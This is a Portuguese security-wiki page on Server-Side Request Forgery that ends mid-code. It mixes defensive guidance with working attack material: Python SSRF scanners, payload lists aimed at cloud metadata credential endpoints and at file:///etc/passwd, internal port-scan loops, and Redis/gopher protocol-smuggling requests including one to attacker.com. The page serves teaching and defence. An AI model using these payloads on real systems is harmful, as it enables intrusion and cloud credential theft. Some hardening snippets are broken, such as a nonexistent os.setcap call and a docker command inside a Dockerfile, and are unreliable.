# Server Side Request Forgery

SSRF é uma vulnerabilidade que permite a um atacante fazer com que o servidor faça requisições HTTP para domínios e recursos arbitrários, frequentemente contornando firewalls e controles de acesso para acessar sistemas internos ou serviços sensíveis.

### Princípio de Funcionamento

```
Requisição Manipulada → Servidor Processa URL → Request Para Recurso Interno → Dados Expostos
        ↓                     ↓                       ↓                       ↓
  Atacante envia URL     Aplicação faz request    Servidor acessa        Informações sensíveis
   maliciosa              para URL fornecida      recursos internos      são retornadas
```

### Características do SSRF

* **Explora a confiança** do servidor em fazer requests
* **Permite acesso a redes internas** e sistemas protegidos
* **Pode contornar firewalls** e controles de segurança de rede
* **Frequentemente crítica** em ambientes cloud e microservices

### Tipos de SSRF

1. **Basic SSRF** - Acesso a recursos internos via URL manipulation
2. **Blind SSRF** - Request é feito mas resposta não é retornada
3. **Semi-Blind SSRF** - Apenas metadados ou status são retornados
4. **Full-Response SSRF** - Resposta completa é retornada ao atacante
5. **Time-Based SSRF** - Explora delays para detectar recursos

***

## ⚔️ Mecanismos de Ataque

### Fluxo de Ataque SSRF

```mermaid
sequenceDiagram
    participant A as Atacante
    participant S as Servidor Vulnerável
    participant I as Recurso Interno
    participant E as Servidor Externo
    participant M as Cloud Metadata Service

    Note over A,M: FASE 1: Reconhecimento
    A->>S: Testa funcionalidades que fazem requests
    Note right of A: Webhooks, importers, previews, proxies
    S->>S: Processa URL fornecida pelo atacante
    S->>E: Faz request para URL externa
    E->>S: Retorna resposta
    S->>A: Encaminha resposta

    Note over A,M: FASE 2: Exploração de Recursos Internos
    A->>S: Envia URL de recurso interno
    Note right of A: http://localhost, http://192.168.1.1, http://169.254.169.254
    S->>I: Faz request para recurso interno
    I->>S: Retorna dados sensíveis
    S->>A: Encaminha dados internos

    Note over A,M: FASE 3: Acesso a Cloud Metadata
    A->>S: Envia URL do metadata service
    Note right of A: http://169.254.169.254/latest/meta-data/
    S->>M: Acessa metadata da instância cloud
    M->>S: Retorna credenciais IAM, tokens, configurações
    S->>A: Expõe credenciais cloud

    Note over A,M: FASE 4: Escalação do Ataque
    A->>A: Usa credenciais obtidas para acesso cloud
    A->>S: Novas explorações com maior acesso
    S->>I: Acessa mais recursos internos
    I->>S: Retorna mais dados sensíveis
    S->>A: Comprometimento completo

    Note over A,M: FASE 5: Post-Exploração
    A->>E: Exfiltra dados obtidos
    A->>M: Acessa serviços cloud com credenciais
    A->>I: Mantém persistência em rede interna
```

### Cenário 1: Acesso a Serviços Locais

```http
POST /webhook/test HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/json

{
  "url": "http://localhost:8080/admin"
}

-- Servidor faz request para localhost e retorna página admin
```

### Cenário 2: Cloud Metadata Access

```http
GET /api/fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: aws-app.com

-- Retorna credenciais IAM da instância EC2
```

### Cenário 3: Port Scanning Interno

```http
POST /url-preview HTTP/1.1
Host: social-media.com
Content-Type: application/json

{
  "url": "http://192.168.1.1:22"
}

-- Pelo tempo de resposta, atacante descobre serviços internos
```

### Cenário 4: Protocolo de Rede Diversos

```http
GET /download?file=file:///etc/passwd HTTP/1.1
Host: file-processor.com

-- Servidor lê arquivo local usando file:// protocol
```

### Cenário 5: SSRF para External Entity (XXE)

```http
POST /xml-processor HTTP/1.1
Host: api.company.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
```

***

## 🔎 Identificação e Detecção

### Indicadores de Vulnerabilidade

```bash
# Funcionalidades que podem ser vulneráveis
- Webhooks (outgoing)
- URL previews/thumbnails
- File importers from URL
- Document converters
- API endpoints that fetch external resources
- Proxy services
- SSO integrations
- Web scraping features
```

### Parâmetros Comumente Vulneráveis

```
url, endpoint, target, redirect, download, file, path
webhook, callback, return, next, image, preview
api, service, resource, fetch, load, import
```

### Metodologia de Teste Manual

{% stepper %}
{% step %}
**1. Testes Básicos de SSRF**

```bash
# Testar com localhost
curl -X POST http://target.com/webhook -d '{"url":"http://localhost:8080"}'

# Testar com IPs internos
curl -X POST http://target.com/fetch -d 'url=http://192.168.1.1'

# Testar cloud metadata
curl -X GET "http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/"

# Testar com file protocol
curl -X POST http://target.com/import -d 'url=file:///etc/passwd'
```

{% endstep %}

{% step %}
**2. Script de Detecção Automatizada**

```python
#!/usr/bin/env python3
# ssrf_scanner.py

import requests
import json
import time
from urllib.parse import urljoin, quote

class SSRFTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.vulnerabilities = []
        
        # Endpoints comuns para SSRF
        self.common_endpoints = [
            '/webhook', '/proxy', '/fetch', '/import',
            '/download', '/preview', '/thumbnail', '/scrape',
            '/api/fetch', '/api/webhook', '/upload/url'
        ]
        
        # Payloads de teste para SSRF
        self.ssrf_payloads = [
            # Internal hosts
            'http://localhost',
            'http://127.0.0.1',
            'http://0.0.0.0',
            'http://[::1]',
            
            # Cloud metadata services
            'http://169.254.169.254',
            'http://169.254.169.254/latest/meta-data/',
            'http://metadata.google.internal',
            'http://169.254.169.254/computeMetadata/v1/',
            
            # Internal network
            'http://192.168.1.1',
            'http://10.0.0.1',
            'http://172.16.0.1',
            
            # File protocol
            'file:///etc/passwd',
            'file:///c:/windows/win.ini',
            
            # DNS rebinding
            'http://localhost.testing.example.com',
            
            # Redirect-based
            'http://redirect.example.com/redirect-to?target=http://localhost'
        ]

    def test_endpoint_ssrf(self, endpoint, method='POST', param_name='url'):
        """Testar endpoint específico para SSRF"""
        print(f"[*] Testando endpoint: {endpoint}")
        
        for payload in self.ssrf_payloads:
            try:
                if method.upper() == 'POST':
                    data = {param_name: payload}
                    response = self.session.post(
                        urljoin(self.target_url, endpoint),
                        data=data,
                        timeout=10
                    )
                else:
                    params = {param_name: payload}
                    response = self.session.get(
                        urljoin(self.target_url, endpoint),
                        params=params,
                        timeout=10
                    )
                
                # Analisar resposta
                vulnerability = self.analyze_ssrf_response(response, payload, endpoint)
                if vulnerability:
                    self.vulnerabilities.append(vulnerability)
                    print(f"[!] Vulnerabilidade encontrada em {endpoint} com payload: {payload}")
                    
            except requests.exceptions.Timeout:
                print(f"[*] Timeout com payload: {payload} - possível blind SSRF")
                self.vulnerabilities.append({
                    'endpoint': endpoint,
                    'payload': payload,
                    'type': 'Possible Blind SSRF (Timeout)',
                    'evidence': 'Request timeout'
                })
            except Exception as e:
                print(f"[!] Erro testando {payload}: {e}")

    def analyze_ssrf_response(self, response, payload, endpoint):
        """Analisar resposta por indicadores de SSRF"""
        indicators = []
        
        # Verificar conteúdo de serviços internos
        internal_indicators = [
            'root:',  # /etc/passwd
            'aws-access-key',  # AWS metadata
            'instance-id',  # Cloud metadata
            'localhost',  # Local services
            '192.168', '10.0', '172.16'  # Internal IPs
        ]
        
        response_text = response.text.lower()
        
        for indicator in internal_indicators:
            if indicator in response_text:
                indicators.append(f"Internal data leaked: {indicator}")
        
        # Verificar diferenças de comportamento
        if response.status_code == 200 and len(response.text) > 1000:
            indicators.append("Large response from internal resource")
        
        # Verificar headers que indicam SSRF
        for header, value in response.headers.items():
            if 'localhost' in value.lower() or '127.0.0.1' in value:
                indicators.append(f"Internal reference in header: {header}")
        
        if indicators:
            return {
                'endpoint': endpoint,
                'payload': payload,
                'type': 'SSRF',
                'indicators': indicators,
                'status_code': response.status_code,
                'response_sample': response.text[:500]  # Primeiros 500 chars
            }
        
        return None

    def test_blind_ssrf(self, endpoint):
        """Testar Blind SSRF usando callbacks externos"""
        print(f"[*] Testando Blind SSRF em: {endpoint}")
        
        # Usar serviços como webhook.site ou requestbin
        callback_urls = [
            'http://webhook.site/unique-id',
            'http://pingb.in/p/unique-id'
        ]
        
        for callback in callback_urls:
            try:
                data = {'url': callback}
                response = self.session.post(
                    urljoin(self.target_url, endpoint),
                    data=data,
                    timeout=5
                )
                
                # Verificar se o callback foi acionado (manual ou automático)
                print(f"[*] Verifique manualmente se callback foi acionado: {callback}")
                
            except Exception as e:
                print(f"[!] Erro testando blind SSRF: {e}")

    def test_protocol_handlers(self, endpoint):
        """Testar diferentes protocol handlers"""
        protocols = [
            'file:///etc/passwd',
            'gopher://localhost:25/xHELO%20localhost',
            'dict://localhost:11211/stat',
            'sftp://localhost/etc/passwd',
            'ldap://localhost',
            'tftp://localhost/test'
        ]
        
        for protocol in protocols:
            try:
                data = {'url': protocol}
                response = self.session.post(
                    urljoin(self.target_url, endpoint),
                    data=data,
                    timeout=5
                )
                
                if response.status_code == 200:
                    print(f"[!] Protocol handler possível: {protocol}")
                    
            except Exception as e:
                print(f"[*] Protocol {protocol} falhou: {e}")

    def comprehensive_scan(self):
        """Scan abrangente para SSRF"""
        print(f"[*] Iniciando scan SSRF em: {self.target_url}")
        
        for endpoint in self.common_endpoints:
            # Testar métodos POST e GET
            self.test_endpoint_ssrf(endpoint, 'POST', 'url')
            self.test_endpoint_ssrf(endpoint, 'GET', 'url')
            
            # Testar nomes de parâmetros alternativos
            for param in ['endpoint', 'target', 'webhook', 'callback']:
                self.test_endpoint_ssrf(endpoint, 'POST', param)
            
            # Testar blind SSRF
            self.test_blind_ssrf(endpoint)
            
            # Testar protocol handlers
            self.test_protocol_handlers(endpoint)

    def generate_report(self):
        """Gerar relatório de vulnerabilidades"""
        return {
            'target_url': self.target_url,
            'vulnerabilities_found': len(self.vulnerabilities),
            'vulnerabilities': self.vulnerabilities,
            'scan_timestamp': time.time()
        }

# Uso do scanner
if __name__ == "__main__":
    import sys
    
    if len(sys.argv) != 2:
        print("Uso: python ssrf_scanner.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    scanner = SSRFTester(target)
    
    scanner.comprehensive_scan()
    report = scanner.generate_report()
    
    print(f"\n[+] Scan completo. Vulnerabilidades encontradas: {report['vulnerabilities_found']}")
    
    for vuln in report['vulnerabilities']:
        print(f"  - {vuln['type']} em {vuln['endpoint']}")
        for indicator in vuln.get('indicators', []):
            print(f"    * {indicator}")
```

{% endstep %}
{% endstepper %}

### Técnicas de Detecção Avançadas

#### 1. DNS Rebinding Detection

```python
def test_dns_rebinding(target_url, endpoint):
    """Testar vulnerabilidade a DNS Rebinding"""
    # Usar serviços como dnsrebind.net
    rebinding_urls = [
        'http://7f000001.0a00020f.rbndr.us/',  # 127.0.0.1 -> 10.0.2.15
        'http://localhost.127.0.0.1.rbndr.us/'
    ]
    
    for url in rebinding_urls:
        try:
            data = {'url': url}
            response = requests.post(
                f"{target_url}{endpoint}",
                data=data,
                timeout=10
            )
            print(f"[*] Testado DNS Rebinding: {url}")
        except Exception as e:
            print(f"[!] Erro com DNS Rebinding: {e}")
```

#### 2. Time-Based Detection

```python
def time_based_ssrf_detection(target_url, endpoint):
    """Detectar SSRF baseado em tempo de resposta"""
    test_urls = {
        'http://localhost:22': 'SSH port (usually slow)',
        'http://192.168.1.1:80': 'Internal web server',
        'http://10.0.0.1:443': 'Internal HTTPS'
    }
    
    for url, description in test_urls.items():
        start_time = time.time()
        
        try:
            data = {'url': url}
            response = requests.post(
                f"{target_url}{endpoint}",
                data=data,
                timeout=5
            )
            response_time = time.time() - start_time
            
            if response_time > 2:  # Threshold arbitrário
                print(f"[!] Slow response ({response_time:.2f}s) para {url} - {description}")
                
        except requests.exceptions.Timeout:
            print(f"[!] Timeout para {url} - possível serviço interno")
```

***

## 💥 Exploração e Impacto

### Técnicas de Exploração Avançadas

{% stepper %}
{% step %}
**1. Cloud Metadata Exploitation**

```http
# AWS EC2 Metadata
GET /api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1

# Azure Instance Metadata
GET /proxy?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1

# Google Cloud Metadata
GET /webhook?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/ HTTP/1.1
```

{% endstep %}

{% step %}
**2. Internal Service Discovery**

```python
def internal_port_scan(target_url, endpoint):
    """Scan de portas internas via SSRF"""
    common_ports = [22, 80, 443, 8080, 3000, 5432, 27017, 6379]
    base_ip = "192.168.1.{}"
    
    for subnet in range(1, 255):
        for port in common_ports:
            test_url = f"http://{base_ip.format(subnet)}:{port}"
            
            try:
                data = {'url': test_url}
                response = requests.post(
                    f"{target_url}{endpoint}",
                    data=data,
                    timeout=1
                )
                
                if response.status_code == 200:
                    print(f"[!] Serviço encontrado: {test_url}")
                    
            except requests.exceptions.Timeout:
                pass  # Porta provavelmente fechada ou filtrada
```

{% endstep %}

{% step %}
**3. Protocol Smuggling**

```http
# FTP via SSRF
POST /import HTTP/1.1
Content-Type: application/json

{
  "url": "ftp://attacker.com/malicious.file"
}

# Redis Command Injection
POST /fetch HTTP/1.1

{
  "url": "dict://localhost:6379/SET%20hacked%20true"
}

# Memcached Injection
POST /proxy HTTP/1.1

{
  "url": "dict://localhost:11211/stats"
}
```

{% endstep %}

{% step %}
**4. SSRF to RCE Chain**

```http
# Step 1: Access internal service
POST /webhook/test HTTP/1.1
{
  "url": "http://localhost:8080/actuator/env"
}

# Step 2: Modify configuration
POST /webhook/test HTTP/1.1
{
  "url": "http://localhost:8080/actuator/refresh"
}

# Step 3: Execute commands
POST /webhook/test HTTP/1.1
{
  "url": "http://localhost:8080/actuator/gateway/routes/refresh"
}
```

{% endstep %}
{% endstepper %}

### Impacto do SSRF

#### Cenários de Ataque e Impacto

```json
{
  "cloud_compromise": {
    "impacto": "Crítico",
    "cenario": "Acesso a credenciais cloud metadata",
    "consequencias": [
      "Comprometimento de toda a infraestrutura cloud",
      "Acesso a buckets S3, bancos de dados, VMs",
      "Escalação lateral entre serviços",
      "Custos financeiros significativos"
    ]
  },
  "internal_network_breach": {
    "impacto": "Alto",
    "cenario": "Acesso a rede interna e sistemas",
    "consequencias": [
      "Roubo de dados sensíveis internos",
      "Acesso a bancos de dados internos",
      "Comprometimento de sistemas legados",
      "Movimento lateral na rede"
    ]
  },
  "data_exfiltration": {
    "impacto": "Alto", 
    "cenario": "Exfiltração de dados via servidor",
    "consequencias": [
      "Exposição de dados de clientes",
      "Roubo de propriedade intelectual",
      "Violação de compliance (GDPR, LGPD)",
      "Danos à reputação"
    ]
  },
  "denial_of_service": {
    "impacto": "Médio",
    "cenario": "SSRF para causar DoS",
    "consequencias": [
      "Indisponibilidade de serviços internos",
      "Consumo excessivo de recursos",
      "Impacto em cadeia em microservices"
    ]
  }
}
```

#### Estatísticas de Impacto

```
- 40% dos ataques SSRF bem-sucedidos resultam em acesso a dados sensíveis
- 25% levam a comprometimento de infraestrutura cloud
- Tempo médio de detecção: 120+ dias
- Custo médio por incidente: $150,000+
```

***

## 🛡️ Mitigação e Correção

### Estratégias de Defesa em Camadas

#### 1. Validação e Lista Branca de URLs

```python
import re
import ipaddress
from urllib.parse import urlparse
from django.http import HttpResponseBadRequest

class SSRFProtection:
    """
    Sistema abrangente de proteção contra SSRF
    """
    
    def __init__(self):
        self.allowed_domains = {
            'api.trusted.com',
            'cdn.company.com',
            'webhooks.valid-partner.com'
        }
        
        self.blocked_ips = self.load_blocked_ips()
        self.allowed_schemes = {'http', 'https'}
        
    def load_blocked_ips(self):
        """Carregar IPs que devem ser bloqueados"""
        blocked_ranges = [
            '127.0.0.0/8',      # localhost
            '10.0.0.0/8',       # private
            '172.16.0.0/12',    # private
            '192.168.0.0/16',   # private
            '169.254.0.0/16',   # link-local
            '0.0.0.0/8',        # current network
            '224.0.0.0/4'       # multicast
        ]
        
        blocked_ips = []
        for range in blocked_ranges:
            blocked_ips.append(ipaddress.ip_network(range))
            
        return blocked_ips
    
    def validate_url(self, url):
        """
        Validar URL de forma segura contra SSRF
        Retorna URL normalizada ou levanta exceção
        """
        if not url:
            raise ValueError("URL não pode ser vazia")
        
        parsed = urlparse(url)
        
        # Validar scheme
        if parsed.scheme not in self.allowed_schemes:
            raise ValueError(f"Scheme não permitido: {parsed.scheme}")
        
        # Resolver hostname para IP
        ip = self.resolve_hostname(parsed.hostname)
        
        # Validar IP contra blocos
        if self.is_blocked_ip(ip):
            raise ValueError(f"IP bloqueado: {ip}")
        
        # Validar domínio contra lista branca
        if not self.is_allowed_domain(parsed.hostname):
            raise ValueError(f"Domínio não permitido: {parsed.hostname}")
        
        # Validar porta (se especificada)
        if parsed.port and not self.is_allowed_port(parsed.port):
            raise ValueError(f"Porta não permitida: {parsed.port}")
        
        return self.normalize_url(parsed)
    
    def resolve_hostname(self, hostname):
        """Resolver hostname para IP com validação"""
        import socket
        
        try:
            # Prevenir DNS rebinding usando timeout curto
            ip = socket.gethostbyname_ex(hostname)[2][0]
            return ipaddress.ip_address(ip)
        except socket.gaierror:
            raise ValueError(f"Não foi possível resolver hostname: {hostname}")
    
    def is_blocked_ip(self, ip):
        """Verificar se IP está em range bloqueado"""
        for blocked_range in self.blocked_ips:
            if ip in blocked_range:
                return True
        return False
    
    def is_allowed_domain(self, domain):
        """Verificar se domínio está na lista branca"""
        # Verificar domínio exato
        if domain in self.allowed_domains:
            return True
        
        # Verificar subdomínios
        for allowed_domain in self.allowed_domains:
            if domain.endswith('.' + allowed_domain):
                return True
        
        return False
    
    def is_allowed_port(self, port):
        """Validar portas permitidas"""
        allowed_ports = {80, 443, 8080, 8443}  # Apenas HTTP/HTTPS
        return port in allowed_ports
    
    def normalize_url(self, parsed_url):
        """Normalizar URL para formato seguro"""
        # Remover user:password se presente
        safe_netloc = parsed_url.hostname
        if parsed_url.port:
            safe_netloc = f"{safe_netloc}:{parsed_url.port}"
        
        return parsed_url._replace(
            netloc=safe_netloc,
            params='',  # Remover parameters
            fragment=''  # Remover fragment
        ).geturl()

# Middleware de proteção
class SSRFProtectionMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response
        self.protection = SSRFProtection()
    
    def __call__(self, request):
        # Interceptar parâmetros de URL em requests
        url_params = self.extract_url_parameters(request)
        
        for param_name, url_value in url_params.items():
            try:
                safe_url = self.protection.validate_url(url_value)
                # Substituir URL original pela validada
                self.replace_url_parameter(request, param_name, safe_url)
            except ValueError as e:
                return HttpResponseBadRequest(f"URL validation failed: {e}")
        
        response = self.get_response(request)
        return response
```

#### 2. Configuração de Network Security

**Docker Security**

```dockerfile
# Dockerfile seguro
FROM python:3.9-slim

# Executar como usuário não-root
RUN groupadd -r app && useradd -r -g app app
USER app

# Configurar security options
docker run --security-opt=no-new-privileges:true \
           --cap-drop=ALL \
           --cap-add=NET_BIND_SERVICE \
           -p 80:8080 \
           my-app
```

**Kubernetes Network Policies**

```yaml
# network-policy.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-external-egress
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  # Permitir apenas DNS
  - ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP
  # Permitir comunicação interna
  - to:
    - namespaceSelector: {}
  # Bloquear tudo mais
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 10.0.0.0/8
        - 172.16.0.0/12
        - 192.168.0.0/16
```

#### 3. Web Application Firewall Rules

```nginx
# nginx-ssrf-protection.conf
http {
    # Map para domínios permitidos
    map $http_referer $allowed_referer {
        default 0;
        "~*\.company\.com$" 1;
        "~*\.trusted-partner\.com$" 1;
    }
    
    server {
        listen 80;
        
        location /api/ {
            # Validar parâmetros de URL
            if ($args ~* "url=https?://(localhost|127\.0|192\.168|10\.|172\.(1[6-9]|2[0-9]|3[0-1]))") {
                return 403;
            }
            
            # Bloquear cloud metadata
            if ($args ~* "url=https?://(169\.254|metadata\.google\.internal)") {
                return 403;
            }
            
            # Rate limiting para endpoints de fetch
            location ~* /api/(fetch|webhook|proxy) {
                limit_req zone=api burst=10 nodelay;
                proxy_pass http://backend;
            }
        }
    }
    
    limit_req_zone $binary_remote_addr zone=api:10m rate=1r/s;
}
```

### Secure Coding Practices

#### 1. Usando HTTP Clients Seguros

```python
import requests
from urllib.parse import urlparse
import ipaddress

class SecureHTTPClient:
    def __init__(self):
        self.session = requests.Session()
        
        # Configurações seguras
        self.session.trust_env = False  # Não usar proxy do sistema
        self.timeout = 5  # Timeout curto
        
        # User agent customizado
        self.session.headers.update({
            'User-Agent': 'SecureCompanyBot/1.0'
        })
    
    def safe_get(self, url, allowed_domains=None):
        """Fazer request HTTP de forma segura"""
        # Validar URL
        parsed = urlparse(url)
        
        if not self.is_safe_domain(parsed.hostname, allowed_domains):
            raise SecurityError(f"Domínio não permitido: {parsed.hostname}")
        
        # Não seguir redirecionamentos automaticamente
        response = self.session.get(
            url,
            timeout=self.timeout,
            allow_redirects=False,
            verify=True  # Sempre verificar SSL
        )
        
        # Validar redirecionamentos manualmente
        if response.status_code in [301, 302, 303, 307, 308]:
            redirect_url = response.headers.get('Location')
            if redirect_url and not self.is_safe_domain(urlparse(redirect_url).hostname, allowed_domains):
                raise SecurityError(f"Redirecionamento para domínio não permitido: {redirect_url}")
            
            # Seguir redirecionamento validado
            response = self.session.get(
                redirect_url,
                timeout=self.timeout,
                allow_redirects=False,
                verify=True
            )
        
        return response
    
    def is_safe_domain(self, domain, allowed_domains=None):
        """Verificar se domínio é seguro"""
        if allowed_domains and domain not in allowed_domains:
            return False
        
        # Bloquear IPs privados e reservados
        try:
            ip = ipaddress.ip_address(domain)
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                return False
        except ValueError:
            pass  # Não é um IP, continuar validação
        
        # Bloquear domínios conhecidos como perigosos
        dangerous_domains = {
            'localhost', '127.0.0.1', '169.254.169.254',
            'metadata.google.internal'
        }
        
        if domain in dangerous_domains:
            return False
        
        return True

class SecurityError(Exception):
    pass
```

#### 2. Environment Hardening

```python
# security/hardening.py
import os
import socket

class EnvironmentHardener:
    """Fortalecimento do ambiente contra SSRF"""
    
    @staticmethod
    def disable_metadata_access():
        """Desabilitar acesso a metadata services"""
        # Bloquear via iptables (Linux)
        os.system("iptables -A OUTPUT -d 169.254.169.254 -j DROP")
        os.system("iptables -A OUTPUT -d metadata.google.internal -j DROP")
    
    @staticmethod
    def configure_secure_dns():
        """Configurar DNS seguro"""
        # Usar DNS seguro que não resolve domínios internos
        with open('/etc/resolv.conf', 'w') as f:
            f.write("nameserver 8.8.8.8\n")
            f.write("nameserver 1.1.1.1\n")
    
    @staticmethod
    def setup_network_restrictions():
        """Configurar restrições de rede"""
        # Criar namespace de rede isolado
        os.system("ip netns add secure-ns")
        
    @staticmethod
    def drop_capabilities():
        """Remover capabilities desnecessárias"""
        # Remover capacidade de raw sockets
        os.setcap('', os.getpid())
```

***

## 🔧 Ferramentas e Testes

### Ferramentas Especializadas em SSRF

#### 1. SSRFmap

```bash
# Instalação
git clone https://github.com/swisskyrepo/SSRFmap.git
cd SSRFmap
pip3 install -r requirements.txt

# Uso básico
python3 ssrfmap.py -r request.txt -p url -m portscan

# Exploração avançada
python3 ssrfmap.py -r request.txt -p url -m cloudmetadata
python3 ssrfmap.py -r request.txt -p url -m readfiles
```

#### 2. Gopherus para SSRF

```bash
# Gerar payloads para diferentes serviços
python gopherus.py --exploit mysql
python gopherus.py --exploit redis
python gopherus.py --exploit postgres

# Usar com SSRF
curl -X POST http://target.com/fetch -d 'url=gopher://attacker.com:11211/_payload'
```

#### 3. Custom SSRF Testing Tool

```python
#!/usr/bin/env python3
# advanced_ssrf_tester.py

import requests
import threading
import time
from concurrent.futures import ThreadPoolExecutor

class AdvancedSSRFTester:
    def __init__(self, target_url, callback_server):
        self.target_url = target_url
        self.callback_server = callback_server
        self.results = []
        
    def test_with_payloads(self, endpoint, method, param):
        """Testar com payloads avançados"""
        payloads = self.generate_advanced_payloads()
        
        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = [
                executor.submit(self.test_single_payload, endpoint, method, param, payload)
                for payload in payloads
            ]
            
            for future in futures:
                result = future.result()
                if result:
                    self.results.append(result)
    
    def generate_advanced_payloads(self):
        """Gerar payloads SSRF avançados"""
        payloads = []
        
        # IPv6 variations
        payloads.extend([
            'http://[::1]',
            'http://[::1]:8080',
            'http://[0000:0000:0000:0000:0000:0000:0000:0001]'
        ])
        
        # Decimal/Octal/Hex IPs
        payloads.extend([
            'http://2130706433',  # 127.0.0.1 em decimal
            'http://0x7f000001',  # 127.0.0.1 em hex
            'http://0177.0.0.1'   # 127.0.0.1 em octal
        ])
        
        # URL encoding variations
        payloads.extend([
            'http://127.1',
            'http://127.0.0.1.nip.io',
            'http://spoofed.burpcollaborator.net'
        ])
        
        return payloads
    
    def test_single_payload(self, endpoint, method, param, payload):
        """Testar payload individual"""
        try:
            if method.upper() == 'POST':
                response = requests.post(
                    f"{self.target_url}{endpoint}",
                    data={param: payload},
                    timeout=5
                )
            else:
                response = requests.get(
                    f"{self.target_url}{endpoint}",
                    params={param: payload},
                    timeout=5
                )
            
            if self.detect_ssrf_indication(response, payload):
                return {
                    'endpoint': endpoint,
                    'payload': payload,
                    'status': response.status_code,
                    'evidence': response.text[:200]
                }
                
        except Exception as e:
            return None
```

### Comandos de Teste Manuais

```bash
# Teste básico com curl
curl -X POST http://target.com/webhook -d 'url=http://169.254.169.254/latest/meta-data/'

# Teste com diferentes métodos HTTP
curl -X PUT http://target.com/api/fetch -d 'url=http://localhost:9200'

# Teste com headers personalizados
curl -H "X-Forwarded-Host: 127.0.0.1" http://target.com/proxy?url=http://example.com

# Teste de port scanning
for port in {1..1000}; do
    curl -s "http://target.com/fetch?url=http://localhost:$port" | grep -q "success" && echo "Port $port open"
done
```

***

## 📋 Checklists de Segurança

### Checklist de Prevenção SSRF

* [ ] **Validação de Input**
  * [ ] Lista branca de domínios e IPs permitidos
  * [ ] Validação de scheme (apenas http/https)
  * [ ] Bloqueio de IPs privados e reservados
  * [ ] Validação de portas permitidas
* [ ] **Configuração de Rede**
  * [ ] Restrições de egress network
  * [ ] Firewall bloqueando metadata services
  * [ ] DNS seguro configurado
  * [ ] Network policies em Kubernetes
* [ ] **Secure Coding**
  * [ ] Usar HTTP clients seguros
  * [ ] Timeouts configurados
  * [ ] Redirecionamentos desabilitados ou validados
  * [ ] User agents customizados
* [ ] **Monitoramento**
  * [ ] Logs de requests HTTP externos
  * [ ] Alertas para tentativas de SSRF
  * [ ] Monitoramento de metadata access
  * [ ] Auditoria regular de endpoints

### Checklist de Auditoria

* [ ] **Testes de Segurança**
  * [ ] Teste com localhost e IPs internos
  * [ ] Teste com cloud metadata services
  * [ ] Teste de protocol handlers diversos
  * [ ] Teste de DNS rebinding
  * [ ] Teste de redirecionamentos
* [ ] **Revisão de Código**
  * [ ] Análise de todos os HTTP clients
  * [ ] Verificação de validação de URLs
  * [ ] Revisão de configurações de rede
  * [ ] Análise de webhooks e callbacks
* [ ] **Configuração de Infraestrutura**
  * [ ] Verificação de network policies
  * [ ] Análise de regras de firewall
  * [ ] Configuração de DNS
  * [ ] Security groups em cloud

### Checklist de Resposta a Incidentes

* [ ] **Detecção**
  * [ ] Monitoramento de requests para IPs internos
  * [ ] Alertas para acesso a metadata services
  * [ ] Análise de logs de aplicação
  * [ ] Relatórios de usuários
* [ ] **Contenção**
  * [ ] Bloqueio de IPs atacantes
  * [ ] Invalidação de credenciais comprometidas
  * [ ] Rotação de chaves cloud
  * [ ] Isolamento de sistemas afetados
* [ ] **Correção**
  * [ ] Implementação de validações
  * [ ] Atualização de configurações de rede
  * [ ] Patch de vulnerabilidades
  * [ ] Reteste de segurança

***

## 📊 Exemplos de Implementação Segura

### Sistema Completo de Proteção SSRF

```python
# security/ssrf_protection.py
import re
import ipaddress
import socket
from urllib.parse import urlparse
from functools import wraps
import logging

logger = logging.getLogger('ssrf_protection')

class SSRFSecurity:
    """
    Sistema abrangente de proteção contra SSRF
    """
    
    def __init__(self):
        self.allowed_domains = set()
        self.blocked_ips = self.get_blocked_ip_ranges()
        self.dns_cache = {}
        
    def get_blocked_ip_ranges(self):
        """Obter ranges de IP bloqueados"""
        return [
            ipaddress.ip_network('127.0.0.0/8'),
            ipaddress.ip_network('10.0.0.0/8'),
            ipaddress.ip_network('172.16.0.0/12'),
            ipaddress.ip_network('192.168.0.0/16'),
            ipaddress.ip_network('169.254.0.0/16'),
            ipaddress.ip_network('0.0.0.0/8'),
            ipaddress.ip_network('224.0.0.0/4')
        ]
    
    def add_allowed_domain(self, domain):
        """Adicionar domínio à lista branca"""
        self.allowed_domains.add(domain.lower())
    
    def safe_url_fetch(self, url, timeout=5, max_redirects=0):
        """
        Fetch seguro de URL com proteção SSRF
        """
        # Validar URL
        safe_url = self.validate_url(url)
        
        # Fazer request com restrições
        return self.http_client.get(
            safe_url,
            timeout=timeout,
            allow_redirects=False,
            max_redirects=max_redirects
        )
    
    def validate_url(self, url):
        """
        Validação completa de URL contra SSRF
        """
        if not url:
            raise SSRFValidationError("URL não pode ser vazia")
        
        parsed = urlparse(url)
        
        # Validar scheme
        if parsed.scheme not in ['http', 'https']:
            raise SSRFValidationError(f"Scheme não permitido: {parsed.scheme}")
        
        # Validar hostname
        hostname = parsed.hostname
        if not hostname:
            raise SSRFValidationError("Hostname não pode ser vazio")
        
        # Resolver e validar IP
        ip = self.resolve_and_validate_hostname(hostname)
        
        # Validar porta
        if parsed.port and not self.is_safe_port(parsed.port):
            raise SSRFValidationError(f"Porta não permitida: {parsed.port}")
        
        # Reconstruir URL segura
        return self.rebuild_safe_url(parsed)
    
    def resolve_and_validate_hostname(self, hostname):
        """Resolver e validar hostname de forma segura"""
        # Verificar cache
        if hostname in self.dns_cache:
            return self.dns_cache[hostname]
        
        try:
            # Resolver com timeout
            info = socket.getaddrinfo(hostname, None, socket.AF_INET, socket.SOCK_STREAM)
            ips = {addr[4][0] for addr in info}
            
            # Validar cada IP
            for ip_str in ips:
